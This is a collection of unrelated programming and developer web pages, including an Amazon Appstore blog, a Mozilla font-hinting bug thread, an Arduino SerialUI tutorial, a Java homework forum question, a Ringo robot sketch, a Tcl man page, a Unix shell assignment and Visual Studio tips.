Because our books are available in so many different countries, monitoring exchange rates has become an important pastime within the office. We deal with Dollars, Euros, Yuan, and Pounds and the constantly changing exchange rates have kept us on our toes. It is important to monitor the currencies you deal with because you can lose business if your prices are too high, and also miss opportunities to generate more revenue if your prices are too low. Monitor your money and don’t lose out on business because of this common mistake. It’s almost impossible to release an app that is absolutely perfect. Listening to the comments of users can really help work out the kinks and improve your app. Within all PlayTales accounts, users have the option to directly contact our tech/localization team in whatever language they want. Because our translators work in-office, we are able to efficiently respond to everyone that contacts us in their native language. If you are going to have a multiple language app, make sure that your users can communicate with your tech team in their preferred language. Adapt your app so that it can be accessed by potentially everyone. PlayTales started out as an app only accessible through iOS devices. But as tablets like the Kindle Fire were released, it became obvious that adapting our apps to function on these devices was necessary. After teaming up with Amazon, we’ve seen a great increase in our number of downloads. Amazon’s submission module makes submitting localized features such as texts, graphics, and user interfaces a simple and quick process. Using Amazon as a distribution platform has made our app easily attainable for tablet users and has given us a chance to enter a market we hadn’t considered before. Remember that iTunes is not your only resource; you can develop and adapt your apps to function on almost any device and consequently tap into new markets. 
Distributing internationally is becoming a necessity for many developers who want to stay on top of the market. Know your target users and develop your app accordingly, remember to use native speakers to help with localization, monitor exchange rates, offer tech support in various languages, and adapt your app to a changing market. Following this advice may help you find the international success we’ve experienced. New technologies are spreading to every part of the world, and along with it the newest applications. Take advantage of this opportunity and go global. October 24, 2012Amazon Mobile App Distribution Program Amazon’s mobile app distribution platform continues to expand internationally, giving developers a chance to grow their businesses. We are pleased to let you know that the Kindle Fire and Kindle Fire HD will be coming soon to Japan. Check out the press release here. Additionally, we started shipping Kindle Fire and Kindle Fire HD tablets to the U.K., France, Germany, Italy and Spain this week. Visit Kindle Fire Developer Resources to build for the Kindle Fire and Kindle Fire HD. And you can learn more about taking your app international with Android localization tips and resources and steps for localizing your app in the Distribution Portal right here on the blog. Sign in to your Amazon Mobile App Distribution Portal account now to get started. We’ve released a beta of the Kindle Fire HD 8.9" emulator to enable you to test and debug your apps in anticipation of the device launch next month. While we recommend developers test their apps on a physical device whenever possible, you can test many aspects of your apps without running your code on a device. This allows you to be confident that the user interface, navigation and flow through the application are as you designed it. The emulator for the Kindle Fire HD 8.9" is currently available as a beta. 
Be aware that the user interface and functionality of the beta emulator may not match the experience available in the Kindle Fire HD 8.9" when it is released later this year. With high-resolution device emulators such as the Kindle Fire HD 8.9", we recommend enabling GPU emulation. This will deliver a smoother graphical experience and a faster start-up experience. While this will help performance throughout the emulator for host computers that support these capabilities, it will have the most impact in graphics-intensive OpenGL-based applications such as games. Learn more by following the instructions at this link. We've also updated the emulators for the all-new Kindle Fire and the Kindle Fire HD 7" to reflect the software in the latest over-the-air software update. Ready to get started? Review the documentation, install the emulators, and give them a whirl. We'd love to hear your feedback in the forums.

Kindle FreeTime is available in the latest over-the-air software update that was released today for the Kindle Fire HD and the all-new Kindle Fire. This new feature provides a dedicated space for kids to interact with books, movies, TV shows, apps, and games. With Kindle FreeTime, parents never have to worry about the content their kids will access: parents select the content their kids will see, and kids can't exit FreeTime without a password. Kindle FreeTime also offers parents enhanced tools to manage their child's content and interaction, including multiple profile support and daily time limits. Parents can create a profile for each of their children and choose which books, movies, TV shows, apps, and games they want to give each child access to. As a developer, you don't need to do anything to participate in Kindle FreeTime other than build great products. Simply by including them in the Amazon Mobile App Distribution Program, your apps will be available for parents to include in their children's personalized experience.
Join the Amazon team, along with mobile app and game developers like you, at AWS re:Invent for two days of sessions covering everything you need to know to grow your business and monetize on Kindle Fire. Amazon's first developer conference is the perfect opportunity for you to learn strategies and tips to help you thrive, from creating engaging user experiences on Kindle Fire to building mobile apps that scale for rapid user adoption. You'll also be able to learn more about Amazon GameCircle, which makes it easy for you to create more engaging gaming experiences via achievements, leaderboards, and sync APIs. Stop by our booth and play with Kindle Fire: we'll have the Kindle Fire HD available, loaded with mobile apps and games that have already been optimized for the tablets. Plus, Amazon Mobile App Distribution marketing and technical representatives will be there, ready to answer your questions on optimizing for and being marketed on Kindle Fire. Here are just some of the sessions offered for mobile app and game developers:

Distributing Apps Through Kindle Fire and the Amazon Appstore for Android.

Creating the Killer App for Kindle Fire. Mike Nash, vice president of Kindle Developer Programs, will be providing tips and optimizations you can easily implement to make the killer app on Kindle Fire and stand out from the crowd.

Monetizing Your App on Kindle Fire: In-App Purchasing Made Easy.

Level Up Your Kindle Games with Amazon GameCircle. Jason Chein, director of Game Services, will be presenting the brand new games library experience, fully integrated with Amazon GameCircle, and offering tips on how to increase customer engagement with your content. This session is open for all but is specifically tailored for game designers, producers, and publishers.

In addition to the sessions and the expo, we will also be hosting other events: AWS re:Invent will be held Tuesday-Thursday, Nov. 27-29, 2012, at the Venetian in Las Vegas.
For more information about AWS re:Invent and to read about the 150+ sessions and other conference activities, go to the AWS re:Invent website. We hope to see you there.

Amazon recently expanded electronic payments to include additional countries. Now more developers in the E.U. can select an electronic payment method as a more convenient way to receive payment. Using electronic payment gives you the benefit of having your mobile app distribution payment sent directly to your bank, reducing the time it takes you to get paid. Plus, electronic deposits paid in your home currency may help you avoid conversion fees that could be imposed by your bank. Sign in to your Amazon Mobile App Distribution Portal account now to make sure your next payment is electronic. Simply select your bank's location from the "Where is your bank/financial institution?" drop-down menu. If available, you will have the option to choose an electronic payment (this could be "wire transfer" or "electronic funds transfer", depending on your location). Once selected, you will need to enter your bank information. The following thresholds must be met before Amazon issues a payment: See our previous post for some additional information here.
https://developer.amazon.com/blogs/appstore/author/amazon+mobile+app+distribution+program?page=2
Load any page into fennec that uses standard variable width fonts and note the kerning (space between the letters). You'll see that letters are oddly spaced. For example, on bugzilla.mozilla.org, you can note that the a's have too much space after them and the t's have too little (check out t's at the ends of words). You can see the same effect on cnn.com. If you zoom in, the kerning is repaired and looks normal. But at the default zoom level, this makes pages hard to read.

1. Go to site (bugzilla.mozilla.org, cnn.com, etc)

== Actual ==
Kerning is messed up.

== Expected ==
Kerning is displayed properly.

Note that if you zoom in, the kerning is displayed properly, but returning to the default zoom level, the incorrect spacing returns. I'll try to get some screen shots. Marking blocking ? because if you can't easily read sites, fennec isn't useful.

Doh: version: Mozilla/5.0 (X11; U; Linux armv6l; en-US; rv:1.9.2a1pre) Gecko/20081219 Fennec/1.0a2pre

sorry for spam

Can someone verify this behavior on the latest nightly? I tried bugzilla and theglobeandmail with no luck. Has it been fixed? Since we set zoom level to <1 on websites that have overflows at 800px width (like theglobeandmail and some urls on bugzilla), I wonder if this only occurs at zoom levels less than 1.

I think it's still an issue. Here's what a globeandmail.com page looks like, zoomed in, with today's nightly:

You can also see it when zooming into article snippets on

Just noticed this isn't a problem on Mac!

Jeff asked, and I'll answer here: I marked this blocking1.9.2+ because it was marked blocking-fennec:1.0+ It may have been fixed a while back; just don't want to lose track.

Is this something specific to fennec builds or happens also on Linux? Windows? Not sure the platform == all makes sense. It would really help to have a testcase and some screenshots to investigate.

I'd like more detail on what the approach is to fix this.
In the platform meeting [1] we discussed that a possible solution would be forking the file that controls this code. I really, really discourage that approach because once you fork that file, we'll lose the ability to test this change as part of the automated regression testing for the general 1.9.2 platform. The fennec tests are not up to snuff to catch any regression issues that might occur as a result of the change. What are the options we're considering here? Is there a WIP patch we can take a look at?

[1]:

(In reply to comment #11) Clint, please set up a testcase with a page that uses a defined set of fonts that don't display correctly in a given environment. Please note whether zooming is required or not to produce the problem. If the problem is on fennec, does the same problem also occur in a Linux environment?

A couple of example test pages using downloadable fonts; these can easily be reworked to use platform fonts:

Kerning is usually a post-process of adjusting the advance widths based on the surrounding characters, but the screen shot in comment 6 looks really off. I don't think this is just a problem with handling kerning data; something else is off, even if the end result looks like a kerning problem.

Any ETA here? This is at this point one of three remaining non-JS core blockers.... and has had no activity at all for a week.

Stuart's under the weather, but is working on the bug.

I hate to do it, but I'd like to revisit the blocking decision on it. Specifically, from looking at the problem with Madhava, I wonder if the gain from fixing kerning will be enough, or if the font appearance problem runs deeper than just kerning. There appeared to be differences in subpixel rendering when compared side by side with another device like the iPhone.

I was asked for another example of the problem, so here: some particularly problematic areas called out with flickr notes

That honestly doesn't look bad to me -- especially since that's zoomed in.
Why would you ever zoom in that much to read text? BTW, is the title of this bug inaccurate? Should it be "kerning incorrect when zoomed in" or is it referring to 100% zoom?

Here is CNN on the Maemo: Default page load: Double tap on a paragraph so I can read it:

(In reply to comment #17)
> BTW, is the title of this bug inaccurate? Should it be "kerning incorrect when
> zoomed in" or is it referring to 100% zoom?

Kerning is observed when zoomed out as well, as Mark points out. By default we zoom to fit the page on the screen. The CNN shots are certainly more illustrative, and zoomed out it affects small text readability :/

Are we sure kerning alone will fix this?

this bug has nothing really to do with kerning

The screenshots in comment 18 are both taken with hinting enabled. How do things look with hinting off? (This will need to be done for subpixel positioning anyway I assume, so would at least be a cheap partial solution?) At what size is the text reflowed?

Stuart doesn't consider this a blocker, and I tend to agree, because we can ifdef this out on non-mobile platforms. this is a 1.9.2 blocker, not a firefox 3.6 one. Stuart's right, though if this becomes the last blocker for Firefox desktop, then we'll declare 1.9.2 complete and Stuart will put this in a 1.9.2.1 on which Firefox for Maemo will be based. Ah, the fun of branch mechanics!

Created attachment 419506 [details] [diff] [review]
disable hinting for mobile

Comment on attachment 419506 [details] [diff] [review]
disable hinting for mobile

In PrepareSortPattern():

>@@ -1746,6 +1746,14 @@
>     }
> #endif
>
>+#ifdef MOZ_GFX_OPTIMIZE_MOBILE
>+    cairo_font_options_t *options = cairo_font_options_create();
>+    cairo_font_options_set_hint_style (options, CAIRO_HINT_STYLE_NONE); // not sure if this takes effect here or not
>+    cairo_font_options_set_hint_metrics (options, CAIRO_HINT_METRICS_OFF); // this doesn't take effect here

Yes, this does nothing here. Don't bother with this line.

>+    cairo_ft_font_options_substitute(options, aPattern);

Docs for cairo_ft_font_options_substitute say "Options that are already in the pattern, are not overridden". In fact, some options will get overridden sometimes, but that is a bug. Really you want this before ApplyGdkScreenFontOptions(). Fortunately, CAIRO_HINT_STYLE_NONE will not be affected (overridden) by the bug. What might be most clear, though, is to only change ApplyGdkScreenFontOptions() (instead of PrepareSortPattern()) to add cairo_font_options_copy() and cairo_font_options_set_hint_style(options, CAIRO_HINT_STYLE_NONE) after gdk_screen_get_font_options() (with a later destroy).

In CreateScaledFont():

>@@ -2520,7 +2528,11 @@
>     // font will be used, but currently we don't have different gfxFonts for
>     // different surface font_options, so we'll create a font suitable for the
>     // Screen. Image and xlib surfaces default to CAIRO_HINT_METRICS_ON.
>+#ifdef MOZ_GFX_OPTIMIZE_MOBILE
>+    cairo_font_options_set_hint_metrics (fontOptions, CAIRO_HINT_METRICS_OFF);
>+#else
>     cairo_font_options_set_hint_metrics(fontOptions, CAIRO_HINT_METRICS_ON);
>+#endif

Looks good.

>+#ifndef MOZ_GFX_OPTIMIZE_MOBILE
>     FcBool hinting;
>     if (FcPatternGetBool(aPattern, FC_HINTING, 0, &hinting) != FcResultMatch) {
>         hinting = FcTrue;
>@@ -2578,6 +2591,9 @@
> #endif
>     }
>     cairo_font_options_set_hint_style(fontOptions, hint_style);
>+#else
>+    cairo_font_options_set_hint_style(fontOptions, CAIRO_HINT_STYLE_NONE);
>+#endif

This shouldn't usually be necessary as this is already set in PrepareSortPattern()/ApplyGdkScreenFontOptions(). It will override user fontconfig settings if users want to force something different (after PrepareSortPattern has set the property). I'll let you choose whether you want to keep this or not.

Created attachment 419530 [details] [diff] [review]
address review comments

pushed. this fixes this bug well enough to close it out, will do rest of subpixel work in another bug.
this looks a lot better with the 20091230 builds on my n810 and n900.
https://bugzilla.mozilla.org/show_bug.cgi?id=470440
First off, if you haven't seen it, check out what you can do with SerialUI and then download it! Once you have SerialUI installed (see the included INSTALL.txt file), the best thing is to look into the example included with the code (in examples/SuperBlinker), but here we'll go over the key points. The following assumes you are developing for Arduino; adjust as required.

Include

The first thing you need is to include the SerialUI functionality. Easy enough:

#include <SerialUI.h>

Strings

We are going to need some strings, to let the user know what's going on. To avoid taking up a ton of space in RAM, just about every SerialUI string is stored in the flash memory and used directly from there (in progmem). There's a little macro that makes declaring these strings easy: SUI_DeclareString(var_name, "string contents"). Just add as many as you need for your interface. You'll want strings for "keys" (the menu item names) and probably for help messages, too.

Let's say we want a simple menu like:

- information
- enable
  - on
  - off

Then we would have this in our code:

// the strings we'll use
SUI_DeclareString(device_greeting, "+++ Welcome to the MyDevice +++\r\nEnter ? for help.");
SUI_DeclareString(top_menu_title, "MyDevice Main Menu");
SUI_DeclareString(info_key, "information");
SUI_DeclareString(info_help, "Retrieve data and current settings");
SUI_DeclareString(enable_key, "enable");
SUI_DeclareString(enable_help, "Enable/disable device");
SUI_DeclareString(enable_on_key, "on");
SUI_DeclareString(enable_off_key, "off");

Now we have some usable strings for our serial user interface.

SerialUI Instance

Next, we need an actual SerialUI object to play with. Simply create it, passing in the greeting message as a parameter to set things up easily:

// our global-scope SerialUI object
SUI::SerialUI mySUI = SUI::SerialUI(device_greeting);

Callbacks

We want our UI to be more than pretty menus: we want it to actually do something.
For this, we'll be associating a callback with every command. These callbacks are just functions which return "void" and take no parameters. What they do is up to you. Here, we'll have 3 commands: information and enable->on/off. So we create 3 callbacks:

/* *********** Callbacks ************ */

void show_info() {
  /* we will output some information. To send data to the user, always use
     the SerialUI object (using it in exactly the same way as the normal
     Arduino Serial): */
  mySUI.print("Hello... ");
  mySUI.println("This is all my info!");
}

void turn_on() {
  /* here we'd turn the device "on" (whatever that means)
     for now, we just: */
  mySUI.println("ON");
}

void turn_off() {
  // same as above, but for "off"
  mySUI.println("OFF");
}

You can do anything you like in the callbacks, including request and read user input (see showEnterDataPrompt() in the advanced usage page).

Setup

We've got our strings and callbacks; time to set up SerialUI and create our menu structure. If you're on an Arduino, the setup() function is called automatically at the start of the program.

void setup() {
  // Remember: SerialUI acts just like Serial,
  // so we need to
  mySUI.begin(115200); // serial line open/setup

  /* there are other settings available, for input timeouts, EOL char and
     such -- SEE the example code! With the config above, set your Serial
     Monitor to 115200 baud and "Newline" line endings.

     Now for the menus (skipping error-checking for simplicity's sake,
     but it's all in the example).

     Get a handle to the top level menu.
     Menus are returned as pointers. */
  SUI::Menu * mainMenu = mySUI.topLevelMenu();

  // Give the top-level menu a decent name
  mainMenu->setName(top_menu_title);

  /* we add commands using... addCommand()
     passing it the key, callback and optionally help string */
  mainMenu->addCommand(info_key, show_info, info_help);

  /* we create sub-menus using... subMenu()
     passing the key and optionally a help string */
  SUI::Menu * enableMenu = mainMenu->subMenu(enable_key, enable_help);

  /* now we have our sub-menu. Give it some commands, too. */
  enableMenu->addCommand(enable_on_key, turn_on);
  enableMenu->addCommand(enable_off_key, turn_off);

  // We are done, yay!
}

Main Loop

The final step is handling serial user requests in the main loop. This is done by checking for the presence of a user, and calling handleRequests() until they are gone. For Arduino, the loop function is the aptly-named loop():

void loop() {
  /* We checkForUser() periodically, to see if anyone is attempting to send
     us some data through the serial port. This code checks all the time,
     for 150 ms, upon entering the loop. In cases where you would like to
     check only the first time around, use checkForUserOnce(), with a larger
     timeout, e.g. mySUI.checkForUserOnce(15000); */

  // check for a user
  if (mySUI.checkForUser(150)) {
    // we have a user initiating contact, show the
    // greeting message and prompt
    mySUI.enter();

    // keep handling the serial user's
    // requests until they exit or timeout.
    while (mySUI.userPresent()) {
      // actually respond to requests, using
      mySUI.handleRequests();
    }
  } // end if we had a user on the serial line

  // below this block, you can do whatever
  // SerialUI-unrelated stuff you need to do.
}

And that's it! SerialUI will now handle connections, navigation and command calls, providing online help as requested. Building this for the Uno, the program compiles to about 7k (a revised version that builds smaller is in the works). If you want to avoid the cut & pasting, download this example source and go from there -- but, really, you'd be better off looking into the full example (in Examples -> SerialUI -> SuperBlinker, in the Arduino IDE once the library is installed.)

For more information about the SerialUI API and customized compilation directives, see the SerialUI Advanced Usage page.

All SerialUI pages:
https://flyingcarsandstuff.com/projects/serialui/using-serialui/
Okay so here's the assignment:

Problem Statement

You have been commissioned by the US Navy to develop a system for tracking the amount of fuel consumed by fleets of ships. Each ship has a name (ex: "Carrier"), fuel capacity (the maximum amount of fuel the ship can carry), and amount of fuel currently onboard. In this problem, fuel is measured in "units" and the capacity of each ship is an integer number (ex: The carrier's capacity is 125 fuel units). Each fleet has exactly four ships in it. When a fleet is deployed, each ship in the fleet is deployed. When a ship is deployed, it consumes half of the fuel it has onboard. When a fleet is refueled, each ship in the fleet is refueled. When a ship is refueled, it is totally filled up (its onboard amount equals its capacity).

Assignment

Your Fleet class needs 4 methods:
- A constructor that takes 4 Ships as parameters.
- A method called deploy that will deploy each ship in the fleet.
- A method called refuel that will refuel each ship in the fleet.
- A method called printSummary that will print, for each ship, the ship's name and the number of fuel units that ship has consumed.

From reviewing the Driver, you can see that you will need a Ship class as well. The constructor of this class will take the ship's name and fuel capacity as parameters. Infer from the Problem Statement what instance variables and methods you need in the Ship class.
Alright so what I have done so far:

public class Ship
{
    private String name;
    private int fuelCapacity;
    private int fuelOnboard;

    /**
     * Constructor for objects of class ship
     */
    public Ship(String inName, int inFuelCapacity)
    {
        name = inName;
        fuelCapacity = inFuelCapacity;
    }

    public int refuled()
    {
        fuelOnboard = fuelCapacity;
    }

    public int deploy()
    {
        fuelOnboard = fuelOnboard/2;
    }

    public String getName()
    {
        return name;
    }

    public int getFuelCapacity()
    {
        return fuelCapacity;
    }
}

public class Fleet
{
    private Ship ship1;
    private Ship ship2;
    private Ship ship3;
    private Ship ship4;

    /**
     * Constructor for objects of class Fleet
     */
    public Fleet(Ship inShip1, Ship inShip2, Ship inShip3, Ship inShip4)
    {
        ship1 = inShip1;
        ship2 = inShip2;
        ship3 = inShip3;
        ship4 = inShip4;
    }

    public void deploy () { }

    public void reFuel() { }

    public void printSummary() { }
}

and the Driver (which was provided):

/**
 * Driver for Outlab2.
 *
 * @author yaw
 * @version 22 Jan 2014
 */
public class Driver
{
    public static void main(String[] args)
    {
        //Creating 4 instances of Ship
        Ship ship1 = new Ship("Carrier", 150);
        Ship ship2 = new Ship("Anti-Submarine", 35);
        Ship ship3 = new Ship("Patrol", 22);
        Ship ship4 = new Ship("Destroyer", 83);

        //Creating instance of Fleet
        Fleet fleet1 = new Fleet(ship1, ship2, ship3, ship4);

        //Deploying the fleet twice
        fleet1.deploy();
        fleet1.deploy();

        //Refuel the fleet once
        fleet1.reFuel();

        //Print summary
        fleet1.printSummary();
    }
}

As you can see I am having trouble with communicating between my Fleet class and my Ship class. Even if I am able to use my deploy method in my Ship class I would still be wondering how to use it on all the ships at once. Also, as you can see I made ship1, ship2... so forth of type Ship and I wasn't sure if this was correct or not. Not sure if my Ship class is correct either. The reason I say that is when I look at the driver.
The driver makes me think I should only have two return statements in my Ship class, while the deploy method from Ship seems like it should be in Fleet. But the problem statement clearly states, in my opinion, that Ship should have a deploy and refuel method along with Fleet. I just need some of you guys' advice on how to interpret the problem statement correctly. Is my Ship class correct? If so, then what am I missing about calling the Ship method from the Fleet class?

--- Update ---

Will simply calling all four of them work, like:

ship1.deploy();
ship2.deploy();
ship3.deploy();
ship4.deploy();
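For what it's worth, here is a minimal sketch of the delegation the update asks about. This is my own illustration, not the official solution: the class name FleetDemo and the "consumed" bookkeeping field are assumptions I added so printSummary has something to report.

```java
// Sketch only: Fleet holds the four Ship references it was given, so
// deploying the fleet is just calling deploy() on each ship in turn.
class Ship {
    private final String name;
    private final int fuelCapacity;
    private int fuelOnboard;   // starts at 0 until the first refuel
    private int consumed;      // total fuel units burned so far (my addition)

    Ship(String name, int fuelCapacity) {
        this.name = name;
        this.fuelCapacity = fuelCapacity;
    }

    void refuel() { fuelOnboard = fuelCapacity; }  // fill to capacity

    void deploy() {                                // burn half of what's onboard
        int burned = fuelOnboard / 2;
        consumed += burned;
        fuelOnboard -= burned;
    }

    int getConsumed() { return consumed; }
    String getName()  { return name; }
}

class Fleet {
    private final Ship ship1, ship2, ship3, ship4;

    Fleet(Ship s1, Ship s2, Ship s3, Ship s4) {
        ship1 = s1; ship2 = s2; ship3 = s3; ship4 = s4;
    }

    // Yes: each Fleet method simply forwards to all four ships.
    void deploy() { ship1.deploy(); ship2.deploy(); ship3.deploy(); ship4.deploy(); }
    void reFuel() { ship1.refuel(); ship2.refuel(); ship3.refuel(); ship4.refuel(); }

    void printSummary() {
        for (Ship s : new Ship[] { ship1, ship2, ship3, ship4 })
            System.out.println(s.getName() + " consumed " + s.getConsumed() + " units");
    }
}

public class FleetDemo {
    public static void main(String[] args) {
        Fleet fleet = new Fleet(new Ship("Carrier", 150), new Ship("Anti-Submarine", 35),
                                new Ship("Patrol", 22), new Ship("Destroyer", 83));
        fleet.reFuel();   // every ship filled to capacity
        fleet.deploy();   // every ship burns half its onboard fuel
        fleet.printSummary();   // e.g. "Carrier consumed 75 units" (150 / 2)
    }
}
```

Note that deploy() needs a void return type here; declaring it `int` without a return statement, as in the posted code, will not compile.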
http://www.javaprogrammingforums.com/whats-wrong-my-code/35686-having-trouble-communicating-between-methods-need-assistance.html
I'm moving on to other ideas of racing with Ringos and thought I should post my line following code. This I'm confident is robust enough to work. There is room for tweaking speed for your own tracks and finding your own improvements. Hope this helps someone out there; I'm just learning like many of you.

Code:

/* sil-line_follow_03 Line Follow
   by Steve Bolton
   if you base your code on mine please leave my name in place and share on
   the plumgeek forum for others to learn from.
   A simple but robust line follow code. Runs well on an oval circuit using
   black electricians tape on a white topped desk. It's meant to run on a
   surface straddling a line made of black tape, though it can work with a
   15mm line of black paint. It runs straight, but if it drifts the eyes
   detect the line and it readjusts. Works best on a 50cm wide circular
   track; hard corners are a problem */

#include "RingoHardware.h"

/* set up hardware */
void setup(){
  HardwareBegin();        // initialize Ringo's brain to work with his circuitry
  PlayStartChirp();       // Play startup chirp and blink eyes
  SwitchMotorsToSerial(); // Call "SwitchMotorsToSerial()" before using Serial.print functions as motors & serial share a line
  SwitchButtonToPixels();
  RestartTimer();
  delay(2000);            // 2 sec delay before start
}

/* declare variables */
int leftOn, leftOff, rightOn, rightOff, rearOn, rearOff;
int leftDiff, rightDiff, rearDiff;
int speedleft, speedright;

void loop(){
  digitalWrite(Source_Select, LOW); // select underside light sensors
  digitalWrite(Edge_Lights, HIGH);  // turn on IR light sources
  delayMicroseconds(500);           // let sensors stabilise

  leftOn = analogRead(LightSense_Left);
  rightOn = analogRead(LightSense_Right);
  rearOn = analogRead(LightSense_Rear);

  SetAllPixelsRGB(0, 0, 0); // all lights off

  // set default speed of 50
  speedleft = 50;
  speedright = 50;
  Motors(speedleft, speedright);

  // use Motors() to turn using multiplier
  if (leftOn < 250) {
    SetPixelRGB(5, 0, 50, 0);
    Motors(speedleft, speedright*3);
  }
  if (rightOn < 250) {
    SetPixelRGB(4, 0, 50, 0);
    Motors(speedleft*3, speedright);
  }
  if (rearOn < 250) {
    SetPixelRGB(0, 0, 50, 0);
  }
}
http://forum.plumgeek.com/viewtopic.php?f=10&t=724&sid=c6049a57f393a8b0f678caf2860d887d
NAME¶
set - Read and write variables

SYNOPSIS¶
set varName ?value?

DESCRIPTION¶
Returns the value of variable varName. If value is specified, then set the value of varName to value, creating a new variable if one does not already exist, and return its value. If varName contains an open parenthesis and ends with a close parenthesis, then it refers to an array element: the characters before the first open parenthesis are the name of the array, and the characters between the parentheses are the index within the array. Otherwise varName refers to a scalar variable.

EXAMPLES¶
Store a random number in the variable r:

set r [expr {rand()}]

SEE ALSO¶
expr(3tcl), global(3tcl), namespace(3tcl), proc(3tcl), trace(3tcl), unset(3tcl), upvar(3tcl), variable(3tcl)

KEYWORDS¶
read, write, variable
https://manpages.debian.org/testing/tcl8.6-doc/set.3tcl.en.html
A command is the path to a file, optionally followed by a variable number of arguments and input and output redirection. The entire command is optionally followed by an ampersand. The path, arguments and file name will not contain the '&', ';', '|', '>', or '<' characters. Input and output redirection may appear before, after or in between arguments. For example, the following are all valid and equivalent:

A list of commands is a sequence of commands separated by semicolons. There may be several semicolons separating two commands. A line is either empty, or any number of lists of commands separated by at most one '|'. Lines are terminated by newline characters.

prompt> /bin/ls
shell.c
prompt> /bin/ls ; /bin/ls
shell.c
shell.c
prompt> /bin/ls ; /bin/ls ; /bin/ls
shell.c
shell.c
shell.c
prompt>

prompt> /bin/ls <
Missing name for redirect.
prompt> /bin/ls >
Missing name for redirect.
prompt>

prompt> /bin/ls < nonexistant
nonexistant: No such file or directory
prompt>

prompt> /bin/ls newfile
/bin/ls: newfile: No such file or directory
prompt> /bin/ls > newfile
prompt> /bin/cat newfile
shell.c
prompt>

prompt> /bin/ls > shell.c
shell.c: File exists
prompt>

For the above you should use the open system call; look at the various arguments it takes.

prompt> /bin/ls < shell.c < shell.c
Ambiguous input redirect.
prompt>

Pipes are the oldest form of UNIX interprocess communication (IPC). They are half-duplex: data only flows in one direction. The pipe system call takes an array of two integers; it puts the file descriptor for reading from the pipe in the first element and the file descriptor for writing to the pipe in the second. Pipes are not useful within a single process, but if a process forks a child (or children) after creating a pipe then both processes have copies of the pipe file descriptors. The process producing data closes the 1st file descriptor and writes to the 2nd file descriptor.
The consuming process closes the 2nd file descriptor and reads from the 1st file descriptor. This code illustrates how your shell could set up a pipe between the two processes in the command "ls | grep foo". Make sure you understand what it does.

The program pnums takes a single argument n and prints the numbers 0 to n-1 on separate lines. The program clines counts the number of lines of input it receives and prints this information. In the following example the output of pnums is piped to clines.

prompt> /u/e/l/eli/537/p1/pnums 3
0
1
2
prompt> /u/e/l/eli/537/p1/pnums 3 | /u/e/l/eli/537/p1/clines
3 lines
prompt>

prompt> /u/e/l/eli/537/p1/pnums 3 | /u/e/l/eli/537/p1/clines > /u/e/l/eli/537/p1/newfile
prompt> /bin/cat /u/e/l/eli/537/p1/newfile
3 lines
prompt>

A process can not receive input from both a pipe AND from input redirection. A process can not output to both a pipe and have its output redirected to a file. You do not have to print the following errors for the following examples, but your code should not segfault on them (we will not assume that part of the command executes successfully).

prompt> /u/e/l/eli/537/p1/pnums 5 | /u/e/l/eli/537/p1/clines < /u/e/l/eli/537/p1/some_file
Ambiguous input redirect.
prompt> /u/e/l/eli/537/p1/pnums 5 > /u/e/l/eli/537/p1/newfile | /u/e/l/eli/537/p1/clines
Ambiguous output redirect.
prompt>

For part 2, when your shell exits (either with Ctrl-d or with the "exit" command) you should not wait for all children to exit before your shell exits. A command that is executed in the background should not be immediately waited on by the shell. But eventually this process must be waited on because after it exits it will stick around until its parent waits on it (it sticks around so that its return code is available). When a process exits its parent is sent the SIGCHLD signal. A signal is like a software interrupt. Signals are received asynchronously (we do not know when the child will die).
To handle this you need to set up a signal handler for SIGCHLD so that processes that exit can be waited on (if you do not wait on them they show up as "defunct" in the ps command's output). The following illustrates what code you need to add.

#include <signal.h>

void handle_sigchld(int s)
{
    /* execute non-blocking waitpid, loop because we may only receive
     * a single signal if multiple processes exit around the same time.
     */
    while (waitpid(0, NULL, WNOHANG) > 0);
}

int main()
{
    ...
    /* register the handler */
    signal(SIGCHLD, handle_sigchld);
    ...
}

prompt> /u/e/l/eli/537/p1/endless | /u/e/l/eli/537/p1/clines &
prompt> /bin/ps
  PID TTY          TIME CMD
 5799 pts/2    00:00:00 tcsh
 6050 pts/2    00:00:00 shell
 6051 pts/2    00:00:03 endless
 6052 pts/2    00:00:00 clines
 6053 pts/2    00:00:00 ps
prompt>

prompt> /u/e/l/eli/537/p1/endless ; /u/e/l/eli/537/p1/endless &
...
...
...
prompt> /u/e/l/eli/537/p1/endless & ; /u/e/l/eli/537/p1/endless &
prompt> /bin/ps
  PID TTY          TIME CMD
 8899 pts/0    00:00:00 tcsh
 9841 pts/0    00:00:00 shell
 9842 pts/0    00:00:19 endless
 9843 pts/0    00:00:19 endless
 9847 pts/0    00:00:00 ps
prompt>

Come up with a high-level algorithm for parsing the command line. As with any assignment, think about the problem before you start diving into code. For example, do you want to go through each token sequentially, or make several passes over the string with different delimiters each time? You might find strtok_r useful for this. Your life will be easier, and your code will be much cleaner, if you use data structures and functions to modularize your code. If you are not familiar with structs, memory allocation (or other C basics) get a copy of "The C Programming Language" or use the online tutorials. If you need practice, try doing some simple exercises like implementing a linked list. If you (1) check the return values of all library and system calls for errors, and (2) check pointer values for NULL before using them you will find the source of many bugs. Use default values.
For example, if you create an array it will initially contain junk values. If you initially set all array elements to NULL, then later observe junk values you know these values are due to a bug in your program. If you are getting a segfault -- look at one of the gdb tutorials to see how to debug your program. Here's the transcript of a shell session using gdb to see which line in a program caused the segfault. The program should be compiled with the -g flag, this is so gcc will include debug information (like line numbers) in the binary.
http://pages.cs.wisc.edu/~eli/537/p1/part2.html
The opinions expressed in these materials are my own and are not necessarily those of Microsoft. Copyright © Microsoft Corporation. All rights reserved. Unless otherwise indicated, all source code provided is licensed under the Microsoft Public License (Ms...

Menu: Tools -> Options -> Text Editor -> All Languages -> General -> Display
Versions: 2008, 2010
Published: 3/7/2010
Code: vstipEdit0025

Line numbers are not on by default. To turn on line numbers just go to Tools -> Options -> Text Editor -> All Languages -> General -> Display and check Line numbers:

Keyboard: CTRL + K, CTRL + C (comment); CTRL + K, CTRL + U (uncomment)
Menu: Edit -> Advanced -> Comment Selection; Edit -> Advanced -> Uncomment Selection
Command: Edit.CommentSelection; Edit.UncommentSelection
Versions: 2008, 2010
Published: 4/13/2010
Code: vstipEdit0047

Download the seriously cool Tip of the Day Extension to get the daily tips delivered to your Start Page!

Sometimes it's the simple stuff we forget about. So I present to you the classic Comment and Uncomment Selection. Naturally, you have the Comment and Uncomment buttons:

And, of course, we have the Menu items:

But it's the keyboard shortcuts that really rock! These will, predictably, comment or uncomment lines of code for you. So, let's say you have some code you want commented out. Just select it:

Then press CTRL + K, CTRL + C (in this example):

